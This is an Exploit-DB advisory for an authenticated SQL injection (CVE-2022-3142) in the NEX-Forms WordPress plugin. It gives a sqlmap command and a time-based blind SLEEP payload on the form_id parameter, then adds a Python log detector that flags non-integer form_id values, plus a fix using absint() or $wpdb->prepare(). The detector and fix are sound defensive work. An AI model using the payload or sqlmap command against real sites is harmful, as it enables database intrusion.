NEX-Forms WordPress plugin < 7.9.7 - Authenticated SQLi

  • Author: Elias Hohl
  • Date: 2023-03-25
  • Category:
  • Platform:
  • Source: https://www.exploit-db.com/exploits/51042/
# Exploit Title: NEX-Forms WordPress plugin < 7.9.7 - Authenticated SQLi
# Exploit Author: Elias Hohl
# Date: 2022-08-01
# Vendor Homepage: https://basixonline.net
# Software Link: https://wordpress.org/plugins/nex-forms-express-wp-form-builder/
# Tested on: Ubuntu 20.04
# CVE : CVE-2022-3142

Authenticated SQL injection vulnerability in the "NEX Forms" WordPress plugin

https://medium.com/@elias.hohl/authenticated-sql-injection-vulnerability-in-nex-forms-wordpress-plugin-35b8558dd0f5

1. Start a new WordPress instance using docker-compose.

2. Install the NEX Forms plugin.

3. Open the URL "/wp-admin/admin.php?page=nex-forms-dashboard&form_id=1" in your browser. Save the request to "nex-forms-req.txt" via Burp Suite.

4. Execute the following command: sqlmap -r nex-forms-req.txt -p form_id --technique=T --dbms=mysql --level 5 --risk 3

sqlmap will find a time-based blind payload:

Parameter: form_id (GET)
Type: time-based blind
Title: MySQL >=5.0.12 AND time-based blind (query SLEEP)
Payload: page=nex-forms-dashboard&form_id=1 AND (SELECT 4715 FROM (SELECT(SLEEP(5)))nPUi)
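The injected parameter above is form_id, which on this dashboard page is only ever a numeric record id, so any request where it is not a plain integer is a reliable signal of probing. The following is an added detection example written for this page; it is not part of the advisory and not code from the plugin. It parses combined-format web access log lines (the sample lines are constructed here, and one of them carries the advisory's time-based payload URL-encoded), restricts itself to requests for /wp-admin/admin.php with page=nex-forms-dashboard, and reports every form_id value that is not a positive integer:

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (combined log format); not from the advisory.
# Line 2 carries the advisory's time-based blind probe, percent-encoded as a browser
# or sqlmap would send it. Line 4 hits a different admin page and is out of scope.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Aug/2022:10:00:01 +0000] "GET /wp-admin/admin.php?page=nex-forms-dashboard&form_id=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Aug/2022:10:00:02 +0000] "GET /wp-admin/admin.php?page=nex-forms-dashboard&form_id=1%20AND%20%28SELECT%204715%20FROM%20%28SELECT%28SLEEP%285%29%29%29nPUi%29 HTTP/1.1" 200 5120 "-" "sqlmap/1.6"
10.0.0.7 - - [01/Aug/2022:10:00:03 +0000] "GET /wp-admin/admin.php?page=nex-forms-dashboard&form_id=2 HTTP/1.1" 200 5130 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Aug/2022:10:00:04 +0000] "GET /wp-admin/admin.php?page=other-plugin&form_id=1%20OR%201=1 HTTP/1.1" 200 100 "-" "Mozilla/5.0"
"""

# Minimal combined-log-format matcher: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# What a legitimate form_id looks like: digits only, nothing else.
INTEGER_ID = re.compile(r"^[0-9]+$")

ADMIN_PATH = "/wp-admin/admin.php"
DASHBOARD_PAGE = "nex-forms-dashboard"


def parse_line(line):
    """Return the parsed fields of one access-log line, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def nexforms_form_id_anomalies(log_text):
    """Return one finding per request to the NEX-Forms dashboard whose form_id is not an integer.

    parse_qs() percent-decodes the value, so the check runs on what the plugin
    itself would see after PHP decodes the query string.
    """
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        parts = urlsplit(rec["target"])
        if not parts.path.endswith(ADMIN_PATH):
            continue
        qs = parse_qs(parts.query, keep_blank_values=True)
        if qs.get("page") != [DASHBOARD_PAGE]:
            continue
        for value in qs.get("form_id", []):
            if not INTEGER_ID.match(value):
                findings.append({
                    "ip": rec["ip"],
                    "timestamp": rec["ts"],
                    "status": rec["status"],
                    "form_id": value,
                })
    return findings


if __name__ == "__main__":
    for f in nexforms_form_id_anomalies(SAMPLE_LOG):
        print(f"{f['timestamp']} {f['ip']} status={f['status']} form_id={f['form_id']!r}")
```

Scoping the check to the dashboard page is a design choice: it keeps the rule tied to the parameter the advisory names and avoids alerting on every non-numeric form_id on unrelated admin pages, which is why the fourth sample line is not reported. A rule like this is a secondary control only; the root-cause fix is for the plugin to coerce form_id to an integer server-side (for example with absint()) or to bind it through $wpdb->prepare() with a %d placeholder before it reaches the query.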